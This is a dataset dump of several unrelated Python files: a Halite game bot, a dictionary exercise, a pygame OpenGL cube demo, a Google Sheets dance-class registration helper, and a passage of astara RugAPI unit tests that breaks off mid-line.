+{"seq_id":"346560054","text":"#!/usr/bin/env python3\n# Python 3.6\n\nimport hlt\nimport time\nimport ptvsd\nimport random\nimport logging\nimport numpy as np\nfrom hlt import constants\nfrom hlt.positionals import Direction\nfrom hlt.entity import Shipyard, Dropoff\n\nclass MyBot:\n\n def __init__(self):\n self.game = hlt.Game()\n\n self.height = self.game.game_map.height\n self.width = self.game.game_map.width\n\n #Initialize settings for different board sizes\n if self.height == 64:\n self.num_steps = 500\n self.offset = 0\n elif self.height == 50:\n self.num_steps = 475\n self.offset = 7\n elif self.height == 40:\n self.num_steps = 425\n self.offset = 12\n else:\n self.num_steps = 400\n self.offset = 16\n \n ptvsd.enable_attach(address=('localhost', 5678))\n ptvsd.wait_for_attach()\n\n #Board info\n self.halite_locations = np.zeros((64,64))\n self.steps_remaining = np.zeros((64,64))\n #My global info\n self.my_ships = np.zeros((64,64))\n self.my_halite = np.zeros((64,64))\n self.dropoffs = np.zeros((64,64))\n self.score = np.zeros((64,64))\n #My current unit info\n self.unit_halite = np.zeros((64,64))\n self.current_unit = np.zeros((64,64))\n #Enemy global info\n #TODO: Generalize for 2 and 4 players\n self.enemy_ships = np.zeros((64,64))\n self.enemy_halite = np.zeros((64,64))\n self.enemy_score = np.zeros((64,64))\n \n self.game.ready(\"MyPythonBot\")\n logging.info(\"Successfully created bot! My Player ID is {}.\".format(self.game.my_id))\n\n def buildInputs(self, cells):\n\n for row in cells:\n for cell in row:\n x = self.offset + cell.position.x\n y = self.offset + cell.position.y\n self.halite_locations[x][y] = cell.halite_amount\n\n #Note: both dropoffs and shipyards count as \"Dropoffs\"\n if cell.has_structure:\n if cell.structure.owner == self.game.my_id:\n self.dropoffs[x][y] = 1\n else:\n #TODO: Do we care about enemy dropoffs?\n pass\n\n if cell.is_occupied:\n if cell.ship.owner == self.game.my_id:\n self.my_ships[x][y] = 1\n self.my_halite[x][y] = cell.ship.halite_amount\n else:\n self.enemy_ships[x][y] = 2\n self.enemy_halite[x][y] = cell.ship.halite_amount\n\n self.score = np.full((64,64), self.game.me.halite_amount)\n self.steps_remaining = np.full((64,64), self.num_steps - self.game.turn_number + 1)\n\n for id, player in self.game.players.items():\n if id != self.game.my_id:\n self.enemy_score = np.full((64,64), player.halite_amount)\n\n\n\n\n def run(self):\n\n while True:\n # This loop handles each turn of the game. The game object changes every turn, and you refresh that state by\n # running update_frame().\n self.game.update_frame()\n # You extract player metadata and the updated map metadata here for convenience.\n me = self.game.me\n game_map = self.game.game_map\n\n self.buildInputs(game_map._cells)\n\n # A command queue holds all the commands you will run this turn. You build this list up and submit it at the\n # end of the turn.\n command_queue = []\n\n for ship in me.get_ships():\n # For each of your ships, move randomly if the ship is on a low halite location or the ship is full.\n # Else, collect halite.\n logging.info(ship.position)\n if game_map[ship.position].halite_amount < constants.MAX_HALITE / 10 or ship.is_full:\n command_queue.append(\n ship.move(\n random.choice([ Direction.North, Direction.South, Direction.East, Direction.West ])))\n else:\n command_queue.append(ship.stay_still())\n\n # If the game is in the first 200 turns and you have enough halite, spawn a ship.\n # Don't spawn a ship if you currently have a ship at port, though - the ships will collide.\n if self.game.turn_number <= 200 and me.halite_amount >= constants.SHIP_COST and not game_map[me.shipyard].is_occupied:\n command_queue.append(me.shipyard.spawn())\n\n # Send your moves back to the game environment, ending this turn.\n self.game.end_turn(command_queue)\n\n\nif __name__ == '__main__':\n bot = MyBot()\n bot.run()\n","sub_path":"MyBot.py","file_name":"MyBot.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"528996553","text":"import pprint\n\nbirthdays = {'Alice': 'Apr 1', 'Bob': 'Dec 12', 'Carol': 'Mar 4'}\n\nwhile True:\n print('Enter a name: (blank to quit)')\n name = input()\n if name == '':\n break\n if name in birthdays:\n print(birthdays[name] + ' is the birthday of ' + name)\n else:\n print('I do not have birthday information for ' + name)\n print('What is their birthday?')\n bday = input()\n birthdays[name] = bday\n print('Birthday database updated.')\nfor name in birthdays.keys():\n print(name)\nfor value in birthdays.values():\n print(value)\nfor items in birthdays.items():\n print(items)\nmessage = 'It was a bright cold day in April, and the clocks were striking thirteen.'\ncount = {}\nfor character in message:\n count.setdefault(character, 0)\n count[character] = count[character] + 1\npprint.pprint(count)","sub_path":"Py_function/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"463497285","text":"import pygame\r\nfrom pygame.locals import *\r\n\r\nfrom OpenGL.GL import *\r\nfrom OpenGL.GLU import *\r\n\r\nvertices = (\r\n # ( x, y, z)\r\n ( 1, -1, -1), # A\r\n ( 1, 1, -1), # B\r\n (-1, 1, -1), # C\r\n (-1, -1, -1), # D\r\n ( 1, -1, 1), # E\r\n ( 1, 1, 1), # F\r\n (-1, -1, 1), # G\r\n (-1, 1, 1) # H\r\n)\r\n\r\nedges = (\r\n (0, 1),\r\n (0, 3),\r\n (0, 4),\r\n (2, 1),\r\n (2, 3),\r\n (2, 7),\r\n (6, 3),\r\n (6, 4),\r\n (6, 7),\r\n (5, 1),\r\n (5, 4),\r\n (5, 7)\r\n)\r\n\r\nsurfaces = (\r\n (0, 1, 2, 3),\r\n (3, 2, 7, 6),\r\n (6, 7, 5, 4),\r\n (4, 5, 1, 0),\r\n (1, 5, 7, 2), \r\n (4, 0, 3, 6)\r\n)\r\n\r\ncolor = (\r\n (1, 0, 0),\r\n (0, 1, 0),\r\n (0, 0, 0),\r\n (0, 0, 1),\r\n (1, 1, 1),\r\n (0, 1, 1),\r\n (1, 0, 0),\r\n (0, 1, 0),\r\n (0, 0, 1),\r\n (0, 1, 0),\r\n (0, 0, 1),\r\n (0, 0, 0)\r\n)\r\n\r\ndef Cube():\r\n glBegin(GL_QUADS)\r\n for surface in surfaces:\r\n x = 0\r\n glColor3fv((1, 0, 0))\r\n for vertex in surface:\r\n x += 1\r\n glColor3fv(color[x])\r\n glVertex3fv(vertices[vertex])\r\n glEnd()\r\n\r\n glBegin(GL_LINES)\r\n glColor3fv((0, 0.9, 0))\r\n for edge in edges:\r\n for vertex in edge:\r\n glVertex3fv(vertices[vertex])\r\n glEnd()\r\n\r\n\r\ndef main():\r\n pygame.init()\r\n screen = pygame.display.set_mode((800, 600), DOUBLEBUF | OPENGL)\r\n\r\n gluPerspective(45, (800 / 600), 0.1, 50)\r\n glTranslatef(0, 0, -40)\r\n glRotatef(0, 0, 0, 0)\r\n\r\n object_passed = False\r\n move_x = 0\r\n move_y = 0\r\n\r\n while not(object_passed):\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n move_x = 0.5\r\n if event.key == pygame.K_RIGHT:\r\n move_x = -0.5\r\n if event.key == pygame.K_UP:\r\n move_y = -0.5\r\n if event.key == pygame.K_DOWN:\r\n move_y = 0.5\r\n\r\n if event.type == pygame.KEYUP:\r\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\r\n move_x = 0\r\n if event.key == pygame.K_UP or event.key == pygame.K_DOWN:\r\n move_y = 0.5\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 4:\r\n glTranslatef(0, 0, -5)\r\n if event.button == 5:\r\n glTranslatef(0, 0, 5)\r\n\r\n x = glGetDoublev(GL_MODELVIEW_MATRIX)\r\n coord = [[c for c in r] for r in x]\r\n # print(coord)\r\n\r\n camera_x = coord[3][0]\r\n camera_y = coord[3][1]\r\n camera_z = coord[3][2]\r\n # print(\"x =\", camera_x, \"y =\", camera_y, \"z =\", camera_z)\r\n\r\n if camera_z < -1:\r\n object_passed = True\r\n\r\n # glRotatef(1, 1, 1, 1)\r\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\r\n glTranslatef(move_x, move_y, 0.5)\r\n Cube()\r\n pygame.display.flip()\r\n pygame.time.wait(10)\r\n\r\nfor i in range(10):\r\n main()\r\n glLoadIdentity()\r\n","sub_path":"VMC Pygame/VMC Pygame - Class/VMC Pygame - Class 17/VMC Pygame - Class 17.py","file_name":"VMC Pygame - Class 17.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"78645697","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 8 16:18:52 2019\r\n\r\nDo some higher order things with the sheet:\r\n - make a summary sheet\r\n - email \r\n\r\nhttps://developers.google.com/sheets/api/samples/reading\r\n\r\n@author: sjgte\r\n\"\"\"\r\n\r\n#import SOMREG_readwrite as rw\r\nimport pandas as pd\r\nimport numpy as np\r\nimport SOMREG_LowOrdSubFun as lsf\r\nfrom tkinter import messagebox\r\n\r\n#%% dump columns back in the forms (what was added was at the end)\r\ndef dumpcolumns(alldata, SheetA, nameSht, rangest='A1'):\r\n # write in json format > easy for columns\r\n bod = {'values':[alldata]}\r\n \r\n SheetA['serv'].spreadsheets().values().update(spreadsheetId=SheetA['ID'], range= nameSht + '!' + rangest + ':Z2000',\r\n valueInputOption = 'RAW', body = bod).execute()\r\n\r\n#%% dump what is currently in alldata back into the form responses\r\ndef dumpdata(alldata, SheetA, nameSht, rangest='A1'):\r\n # first do the columsn\r\n col = alldata.columns\r\n col = col.values.tolist()\r\n # writ in json formate\r\n listv = alldata.values.tolist()\r\n listv = [col] + listv\r\n bod = {'values':listv} \r\n SheetA['serv'].spreadsheets().values().update(spreadsheetId=SheetA['ID'], range= nameSht + '!' + rangest + ':Z2000',\r\n valueInputOption = 'RAW', body = bod).execute()\r\n\r\n#%% check if the form has the relevant columns and initialize orderwise\r\ndef checkFormAndInit(SheetA, nameSht, rowv=1): \r\n val = lsf.readandprint(SheetA,nameSht+'!A' + str(rowv) + ':Z' + str(rowv),0)\r\n\r\n # check if columns are present\r\n NeededColumns = ['Registration Type','Email Address', 'Role(s)','Full Name']\r\n MissingColumns = []\r\n for colnm in NeededColumns:\r\n if (colnm in val[0]) == False:\r\n MissingColumns.append(colnm)\r\n \r\n if len(MissingColumns)>0:\r\n messagebox.showinfo('Title', 'Form Mistake, missing entries:' + '/'.join(MissingColumns) + '\\n\\n ALSO CHECK SPACES')\r\n else: \r\n # add columns that are not in the form but manually added\r\n ColumnsToAddIfMissing = ['Confirmation sent?','Confirmed as','Waitlisted?','Bank or cash?','Amount','Notes']\r\n for colnm in ColumnsToAddIfMissing:\r\n if (colnm in val[0]) == False:\r\n val[0].append(colnm)\r\n # dump all back in form\r\n dumpcolumns(val[0], SheetA, nameSht)\r\n \r\n#%% provides a summary sheet\r\ndef sumSheet(SheetA, alldata):\r\n # print basics:\r\n # new sheet if needed\r\n if lsf.getnamesh(SheetA['sheetinfo'],1) != 'Summary':\r\n req = {\"requests\": [{\"addSheet\": { \"properties\": {\r\n \"title\": \"Summary\", \"gridProperties\": {\"rowCount\": 20,\"columnCount\": 12}}}}]} \r\n request = serv.spreadsheets().batchUpdate(spreadsheetId=SheetA['ID'], body=req)\r\n request.execute() \r\n \r\n # summary for the registration\r\n Type = ['Lead', 'Follow','Couple','Ambi']\r\n Conf = ['yes', 'no']\r\n Val = ['Student', 'Regular','Other','All'] \r\n \r\n # write the basic body\r\n bod = {'values':[['Summary ' + lsf.getnow()],\r\n ['','']+Type,\r\n ['Confirmed']+[Val[0]],\r\n ['']+[Val[1]],\r\n ['']+[Val[2]],\r\n ['']+[Val[3]],\r\n [''],\r\n ['NonConfirmed']+[Val[0]],\r\n ['']+[Val[1]],\r\n ['']+[Val[2]],\r\n ['']+[Val[3]]]}\r\n SheetA['serv'].spreadsheets().values().update(spreadsheetId=SheetA['ID'], range='Summary!A1:F20',\r\n valueInputOption = 'RAW', body = bod).execute()\r\n \r\n # assumed that Ccnt is the highest level. The rests gets counted in... \r\n alldata = lsf.readtoDF(SheetA, lsf.getnamesh(SheetA['sheetinfo'],0))\r\n \r\n val = {'values': [[] for i in range(20)]}\r\n for Ccnt,Cval in enumerate(Conf):\r\n C = alldata[alldata['Confirmation sent?'].str.contains(Cval)==True]\r\n for Tcnt, Tval in enumerate(Type):\r\n if Cval == 'yes':\r\n CT = C[C['Confirmed as'].str.contains(Tval)==True]\r\n else:\r\n CT = C[C['Role(s)'].str.contains(Tval)==True]\r\n for Vcnt, Vval in enumerate(Val):\r\n if Vval == 'All':\r\n CTV = CT\r\n elif Vval == 'Other':\r\n searchfor = ['Student','Regular']\r\n CTV = CT[~CT['Registration Type'].str.contains('|'.join(searchfor))]\r\n else:\r\n CTV = CT[CT['Registration Type'].str.contains(Vval)==True] \r\n val['values'][len(Val)*Ccnt+Vcnt] = val['values'][len(Val)*Ccnt+Vcnt] + [len(CTV)] \r\n val['values'].insert(len(Val),[''])\r\n colv = lsf.checkcol(SheetA,'Summary',Type[0],2) \r\n \r\n # for confirmed make summary of final amount of couples and extras:\r\n allconf = val['values'][Conf.index('yes')*4+Val.index('All')]\r\n leadfol = [allconf[Type.index('Lead')]]+[allconf[Type.index('Follow')]]\r\n lfname = ['Lead','Follow']\r\n index_min = np.argmin(leadfol)\r\n index_max = np.argmax(leadfol) \r\n TotCop = leadfol[index_min]+allconf[Type.index('Couple')]\r\n TotAmbi = allconf[Type.index('Ambi')]\r\n \r\n val['values'][len(Val)*len(Conf)+len(Conf)].append('Totals Confirmed:')\r\n val['values'][len(Val)*len(Conf)+len(Conf)+1].append('Couples:')\r\n val['values'][len(Val)*len(Conf)+len(Conf)+1].append(TotCop)\r\n val['values'][len(Val)*len(Conf)+len(Conf)+2].append('Extra '+lfname[index_max])\r\n val['values'][len(Val)*len(Conf)+len(Conf)+2].append(leadfol[index_max]-leadfol[index_min])\r\n val['values'][len(Val)*len(Conf)+len(Conf)+3].append('Ambis')\r\n val['values'][len(Val)*len(Conf)+len(Conf)+3].append(TotAmbi) \r\n \r\n relout = {'ConfirmedCouples': TotCop, \r\n 'Extras': leadfol[index_max]-leadfol[index_min], 'ExtraRole': lfname[index_max],\r\n 'Ambis':TotAmbi}\r\n \r\n # write to excel sheet \r\n SheetA['serv'].spreadsheets().values().update(spreadsheetId=SheetA['ID'], range='Summary!' + colv + '3:Z100',\r\n valueInputOption = 'RAW', body=val).execute()\r\n \r\n ## summary for the financing \r\n Reg = ['Student','Regular','Other','All'] \r\n Payment = ['B','C','NONE']\r\n\r\n # write the basic body\r\n bod = {'values':[['Numbers'],\r\n ['']+Payment,\r\n [Reg[0]],\r\n [Reg[1]],\r\n [Reg[2]],\r\n [Reg[3]],\r\n [''],\r\n [''],\r\n ['Amounts'],\r\n ['']+Payment,\r\n [Reg[0]],\r\n [Reg[1]],\r\n [Reg[2]],\r\n [Reg[3]]]}\r\n SheetA['serv'].spreadsheets().values().update(spreadsheetId=SheetA['ID'], range='Summary!I2:O20',\r\n valueInputOption = 'RAW', body = bod).execute()\r\n \r\n inxT = []\r\n Payv = []\r\n TotAmount = []\r\n val = {'values': [[] for i in range(20)]}\r\n for Rcnt,Rval in enumerate(Reg):\r\n if Rval == 'Other': # nondefined\r\n inxT.append(list(np.array(inxT).sum(0)==0))\r\n elif Rval == 'All':\r\n inxT.append([True for it in range(0,len(inxT[-1]))])\r\n else:\r\n inxT.append(list(alldata['Registration Type'].str.contains(Rval)==True)) \r\n\r\n # get the amount that should have been paid (ONLY WORKS FOR INTEGERS NOW!)\r\n pv = list(alldata['Registration Type'][inxT[-1]])\r\n if len(pv)>0:\r\n numinx = [char for char in pv[0] if char.isdigit()==True]\r\n if len(numinx)>0:\r\n Payv.append(int(''.join(numinx)))\r\n else:\r\n Payv.append('?')\r\n else:\r\n Payv.append('?')\r\n for Pcnt, Pval in enumerate(Payment): \r\n if Pval == 'NONE':\r\n searchfor = ['B','C']\r\n inxB = alldata['Bank or cash?'].str.contains('|'.join(searchfor))==True\r\n inxB = inxB==False\r\n else: \r\n inxB = alldata['Bank or cash?'].str.contains(Pval)==True\r\n fi = [i for i,j in enumerate(inxT[-1]) if j==True & inxB[i]==True] \r\n # check amount of Couples in this list\r\n amC = sum(alldata['Role(s)'][fi].str.contains('Couple')==True) \r\n TotPeople = len(fi)+amC\r\n \r\n ar = list(alldata['Amount'][fi])\r\n if len(ar)==1:\r\n try:\r\n float(ar)\r\n arF = [float(ar),0]\r\n except:\r\n arF = [0,0] \r\n elif len(ar)> 1:\r\n arIx = np.char.isnumeric(ar)\r\n arF = [float(i) for indx,i in enumerate(ar) if arIx[indx] == True]\r\n else:\r\n arF = [0,0]\r\n \r\n TotAmount.append(sum(arF))\r\n val['values'][Rcnt].append(float(TotPeople)) \r\n val['values'][len(Reg)+Rcnt+4].append(TotAmount[-1]) \r\n val['values'][len(Reg)*2+5] = ['Total', sum(TotAmount)/2] # divided by to as also all is added \r\n SheetA['serv'].spreadsheets().values().update(spreadsheetId=SheetA['ID'], range='Summary!J4:O20',\r\n valueInputOption = 'RAW', body = val).execute()\r\n \r\n return relout \r\n\r\n#%% check and send the confirmation email and update sheet, send waiting list if needed\r\ndef checkRolesConfirmation(SheetA, nameSht, alldata, sumDat, EmServ): \r\n dfsel = pd.DataFrame(alldata[alldata['Confirmation sent?'].str.contains('no') == True])\r\n # prefill confirmed as none\r\n dfsel.loc[:,'Confirmed as'] = 'none'\r\n \r\n # go row by row to check if there is space\r\n # ambis get assign at a later point, not yet \r\n NoElLeft = False\r\n cnt = 0\r\n newSumDat = {}\r\n while NoElLeft == False and len(dfsel)>0:\r\n dfinx = dfsel.index\r\n # define couples including ambi couples\r\n newSumDat = {}\r\n newSumDat['ExtraRole'] = sumDat['ExtraRole']\r\n if (sumDat['Ambis'] < sumDat['Extras']):\r\n # not enough ambis to fill the extras\r\n newSumDat['Extras'] = sumDat['Extras']-sumDat['Ambis']\r\n newSumDat['ConfirmedCouples'] = sumDat['ConfirmedCouples']+sumDat['Ambis']\r\n elif (sumDat['Ambis'] == sumDat['Extras']):\r\n # same amount of amis as extras:\r\n newSumDat['Extras'] = 0\r\n newSumDat['ConfirmedCouples'] = sumDat['ConfirmedCouples']+sumDat['Ambis']\r\n elif (sumDat['Ambis'] > sumDat['Extras']):\r\n newSumDat['ExtraRole'] = 'Ambi'\r\n # more ambis than extras, the ambis themselves can form couples:\r\n ExtraAm = sumDat['Ambis']-sumDat['Extras']\r\n AmbiCoupl = int(np.floor(np.array(ExtraAm)/2))\r\n if ExtraAm % 2 == 1:\r\n newSumDat['Extras']=1 # only extra if odd number of ambis\r\n else:\r\n newSumDat['Extras']=0\r\n newSumDat['ConfirmedCouples'] = sumDat['ConfirmedCouples']+AmbiCoupl+sumDat['Extras']\r\n # possible that we reach to too many couples. Control for that\r\n if newSumDat['ConfirmedCouples']>sumDat['MaxCouples']:\r\n newSumDat['Extras'] = newSumDat['Extras']+(newSumDat['ConfirmedCouples']-sumDat['MaxCouples'])*2\r\n newSumDat['ConfirmedCouples'] = sumDat['MaxCouples']\r\n \r\n # go through single person\r\n inxV = dfinx[cnt]\r\n Role = dfsel['Role(s)'][inxV]\r\n \r\n # class full, so no need to check anymore\r\n if (newSumDat['ConfirmedCouples'] >= sumDat['MaxCouples']) and (newSumDat['Extras'] >= sumDat['MaxExtras']):\r\n NoElLeft = True\r\n \r\n # go through all options\r\n if 'no' in dfsel['Confirmation sent?'][inxV]: \r\n # couples\r\n if ('Couple' in Role) and (newSumDat['ConfirmedCouples'] < sumDat['MaxCouples']):\r\n # couple can be added as there are less than max couples\r\n sumDat['ConfirmedCouples'] = sumDat['ConfirmedCouples']+1\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Couple')\r\n cnt = cnt+1 # go to next, as this doesn't help people earlier on the list\r\n elif ('Couple' in Role) and (newSumDat['ConfirmedCouples'] >= sumDat['MaxCouples']):\r\n # couple cannot be added as max couples reached\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'WL COUPLES FULL', True)\r\n cnt = cnt+1 # go to next, as this doesn't help people earlier on the list\r\n \r\n # ambis\r\n elif ('Ambi' in Role) and (newSumDat['ConfirmedCouples'] < sumDat['MaxCouples']):\r\n # ambis can always join if the couples are not full\r\n sumDat['Ambis'] = sumDat['Ambis']+1\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Ambi')\r\n cnt = 0 # this could help other people in list\r\n elif ('Ambi' in Role) and (newSumDat['ConfirmedCouples'] >= sumDat['MaxCouples']):\r\n # if couples full ambis can only join if the amount of extras is not yet full\r\n if newSumDat['Extras'] < sumDat['MaxExtras']:\r\n sumDat['Ambis'] = sumDat['Ambis']+1\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Ambi')\r\n cnt = 0 # might have influence on amount of couples/extras\r\n else:\r\n # if ambi cannot be added anymore, then nobody can be added anymore\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'WL ALL FULL', True)\r\n NoElLeft = True\r\n \r\n # follows\r\n elif ('Follow' in Role) and (newSumDat['ConfirmedCouples'] < sumDat['MaxCouples']):\r\n if (sumDat['ExtraRole'] == 'Lead') and (sumDat['Extras'] > 0):\r\n # follow can be added as enough space for new couple + extra leads\r\n sumDat['Extras'] = sumDat['Extras']-1\r\n sumDat['ConfirmedCouples'] = sumDat['ConfirmedCouples']+1\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Follow')\r\n cnt = 0 # could be that in list was a leader that can now be added\r\n elif sumDat['Extras'] == 0: \r\n # follow can be added as enough space for new couple + no extras\r\n sumDat['Extras'] = 1\r\n sumDat['ExtraRole'] = 'Follow'\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Follow')\r\n cnt = 0 # could help an ambi\r\n elif (sumDat['ExtraRole'] == 'Follow') and (newSumDat['Extras'] < sumDat['MaxExtras']): \r\n # follow can be added as not yet max amount of extra follows\r\n sumDat['Extras'] = sumDat['Extras']+1\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Follow')\r\n cnt = 0 # could help an ambi\r\n else:\r\n # follow cannot be added, max of extra follows reached\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'WL MAX EXTRA FOLLOW', True)\r\n cnt = cnt+1\r\n elif ('Follow' in Role) and (sumDat['ConfirmedCouples'] >= sumDat['MaxCouples']):\r\n # couples are full, Follow can be added as extra\r\n if (newSumDat['Extras'] == 0):\r\n sumDat['Extras'] = sumDat['Extras'+1]\r\n sumDat['ExtraRole'] = 'Follow'\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Follow')\r\n cnt = cnt + 1 # this doesn't help people earlier on the list\r\n elif (sumDat['ExtraRole'] == 'Follow') and (newSumDat['Extras'] < sumDat['MaxExtras']):\r\n sumDat['Extras'] = sumDat['Extras']+1\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Follow') \r\n cnt = cnt+1 # this doesn't help people earlier on the list\r\n else:\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'WL MAX EXTRA FOLLOW', True)\r\n # nobody can be added anymore:\r\n NoElLeft = True\r\n \r\n # leads\r\n elif ('Lead' in Role) and (newSumDat['ConfirmedCouples'] < sumDat['MaxCouples']):\r\n if (sumDat['ExtraRole'] == 'Follow') and (sumDat['Extras'] > 0):\r\n # lead can be added as enough space for new couple + extra follows\r\n sumDat['Extras'] = sumDat['Extras']-1\r\n sumDat['ConfirmedCouples'] = sumDat['ConfirmedCouples']+1\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Lead')\r\n cnt = 0 # could be that in list was a follow that can now be added\r\n elif sumDat['Extras'] == 0: \r\n # lead can be added as enough space for new couple + no extras\r\n sumDat['Extras'] = 1\r\n sumDat['ExtraRole'] = 'Lead'\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Lead')\r\n cnt = 0 # could help an ambi\r\n elif (sumDat['ExtraRole'] == 'Lead') and (newSumDat['Extras'] < sumDat['MaxExtras']): \r\n # lead can be added as not yet max amount of extra leads\r\n sumDat['Extras'] = sumDat['Extras']+1\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Lead')\r\n cnt = 0 # could help an ambi\r\n else:\r\n # lead cannot be added, max of extra lead reached\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'WL MAX EXTRA LEADS', True)\r\n cnt = cnt+1\r\n elif ('Lead' in Role) and (sumDat['ConfirmedCouples'] >= sumDat['MaxCouples']):\r\n # couples are full, Lead can be added as extra\r\n if (newSumDat['Extras'] == 0):\r\n sumDat['Extras'] = sumDat['Extras'+1]\r\n sumDat['ExtraRole'] = 'Lead'\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Lead')\r\n cnt = cnt + 1 # this doesn't help people earlier on the list\r\n elif (sumDat['ExtraRole'] == 'Lead') and (newSumDat['Extras'] < sumDat['MaxExtras']):\r\n sumDat['Extras'] = sumDat['Extras']+1\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'Lead')\r\n cnt = cnt+1 # this doesn't help people earlier on the list\r\n else:\r\n dfsel = lsf.changeConfirm(dfsel,inxV, 'WL MAX EXTRA LEAD', True)\r\n # nobody can be added anymore:\r\n NoElLeft = True \r\n else:\r\n cnt = cnt+1\r\n else:\r\n cnt = cnt+1 \r\n if cnt == len(dfinx):\r\n NoElLeft = True\r\n \r\n dfsel.loc[dfsel[dfsel['Confirmed as'].str.contains('none') == True].index,'Waitlisted?'] = 'WL FULL'\r\n return dfsel, sumDat, newSumDat\r\n \r\n#%% random code not used atm\r\n# =============================================================================\r\n# RANGE = 'Sheet1!B2'\r\n# serv = openreadwrite()\r\n# readandprint(serv, SPREADSHEET_ID, 'A1:B2')\r\n# \r\n# #v = serv.spreadsheets().values().get(spreadsheetId=SPREADSHEET_ID, range=RANGE).execute()\r\n# bod = {\"values\": [[ 'getting wijntjes'], []]}\r\n# vn = serv.spreadsheets().values().update(spreadsheetId=SPREADSHEET_ID, range=RANGE, \r\n# valueInputOption = 'RAW', body = bod).execute()\r\n# \r\n# readandprint(serv, SPREADSHEET_ID, 'A1:B2')\r\n# =============================================================================\r\n","sub_path":"SOMREG_HighOrdSubFun.py","file_name":"SOMREG_HighOrdSubFun.py","file_ext":"py","file_size_in_byte":19605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"163934061","text":"import unittest\nimport socket\n\nfrom six.moves import range\nfrom cliff import commandmanager\nimport mock\nfrom oslo_log import log\nimport webob\n\nfrom astara.api import rug\n\n\ntry:\n import blessed # noqa\n HAS_BLESSED = True\nexcept ImportError:\n HAS_BLESSED = False\n\n\nclass TestRugAPI(unittest.TestCase):\n\n def setUp(self):\n ctl = mock.Mock()\n ctl.return_value.command_manager = commandmanager.CommandManager(\n 'astara.cli'\n )\n self.api = rug.RugAPI(ctl)\n self.ctl = ctl.return_value\n\n @unittest.skipUnless(HAS_BLESSED, \"blessed not available\")\n def test_browse(self):\n resp = self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/browse/'\n }))\n assert isinstance(resp, webob.exc.HTTPNotImplemented)\n assert not self.ctl.run.called\n\n def test_ssh(self):\n resp = self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/ssh/ROUTER123/'\n }))\n assert isinstance(resp, webob.exc.HTTPNotImplemented)\n assert not self.ctl.run.called\n\n def test_poll(self):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/poll/'\n }))\n self.ctl.run.assert_called_with(\n ['--debug', 'poll']\n )\n\n def test_missing_argument(self):\n # argparse failures (e.g., a missing router ID) raise a SystemExit\n # because cliff's behavior is to print a help message and sys.exit()\n self.ctl.run.side_effect = SystemExit\n resp = self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/router/debug/'\n }))\n assert isinstance(resp, webob.exc.HTTPBadRequest)\n self.ctl.run.assert_called_with(\n ['--debug', 'router', 'debug']\n )\n\n def test_router_debug(self):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/router/debug/ROUTER123'\n }))\n self.ctl.run.assert_called_with(\n ['--debug', 'router', 'debug', 'ROUTER123']\n )\n\n def test_router_manage(self):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/router/manage/ROUTER123'\n }))\n self.ctl.run.assert_called_with(\n ['--debug', 'router', 'manage', 'ROUTER123']\n )\n\n def test_router_update(self):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/router/update/ROUTER123'\n }))\n self.ctl.run.assert_called_with(\n ['--debug', 'router', 'update', 'ROUTER123']\n )\n\n def test_router_rebuild(self):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/router/rebuild/ROUTER123'\n }))\n self.ctl.run.assert_called_with(\n ['--debug', 'router', 'rebuild', 'ROUTER123']\n )\n\n def test_tenant_debug(self):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/tenant/debug/TENANT123'\n }))\n self.ctl.run.assert_called_with(\n ['--debug', 'tenant', 'debug', 'TENANT123']\n )\n\n def test_tenant_manage(self):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/tenant/manage/TENANT123'\n }))\n self.ctl.run.assert_called_with(\n ['--debug', 'tenant', 'manage', 'TENANT123']\n )\n\n def test_workers_debug(self):\n self.api(webob.Request({\n 'REQUEST_METHOD': 'PUT',\n 'PATH_INFO': '/workers/debug/'\n }))\n self.ctl.run.assert_called_with(\n ['--debug', 'workers', 'debug']\n )\n\n def test_invalid_router_action(self):\n resp = 